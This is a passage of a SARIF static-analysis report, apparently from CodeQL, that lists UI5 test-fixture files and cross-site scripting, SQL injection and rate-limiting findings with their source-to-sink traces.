"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 328 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 329 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 330 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 332 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 333 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 334 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 335 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 336 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 337 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 338 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 339 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 340 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 341 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 342 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", - "uriBaseId" : "%SRCROOT%", - "index" : 344 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 345 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 346 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 347 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 349 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 350 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 351 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 353 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 354 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 357 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 358 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 359 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 360 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 364 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 365 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 366 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 368 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 369 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 370 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 372 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 373 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 374 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 376 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 377 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 378 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 380 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 381 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 383 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 384 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 385 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 390 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 391 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 392 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 394 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 395 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 400 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 401 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 404 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 405 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 408 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 409 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - } - }, { - "location" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 412 - } - }, { - "location" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 413 - } - }, { - "location" : { - "uri" : "qlt.conf.json", - "uriBaseId" : "%SRCROOT%", - "index" : 414 - } - }, { - "location" : { - "uri" : "scripts/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 415 - } - }, { - "location" : { - "uri" : "scripts/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 416 - } - } ], - "results" : [ { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6311a9ed7e4091a4:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 4, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 11, - "startColumn" : 20, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8e517fc6fdf32a1a:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 11, - "startColumn" : 20, - "endColumn" : 25 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 19, - "startColumn" : 20, - "endColumn" : 26 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "c51cf11a085c01f4:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 19, - "startColumn" : 20, - "endColumn" : 26 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/xss", - "rule" : { - "id" : "js/xss", - "index" : 34, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 27, - "startColumn" : 20, - "endColumn" : 26 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e309bf8540256a05:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 26, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 27, - "startColumn" : 20, - "endColumn" : 26 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 25, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/missing-rate-limiting", - "rule" : { - "id" : "js/missing-rate-limiting", - "index" : 68, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "This route handler performs [a database access](1), but is not rate-limited." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 40, - "startColumn" : 25, - "endLine" : 44, - "endColumn" : 8 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "ac6d3bdd3d52ea9b:1", - "primaryLocationStartColumnFingerprint" : "18" - }, - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 9, - "endLine" : 43, - "endColumn" : 11 - } - }, - "message" : { - "text" : "a database access" - } - } ] - }, { - "ruleId" : "js/sql-injection", - "rule" : { - "id" : "js/sql-injection", - "index" : 78, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "This query string depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "4fc3122b51f477a1:1", - "primaryLocationStartColumnFingerprint" : "11" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 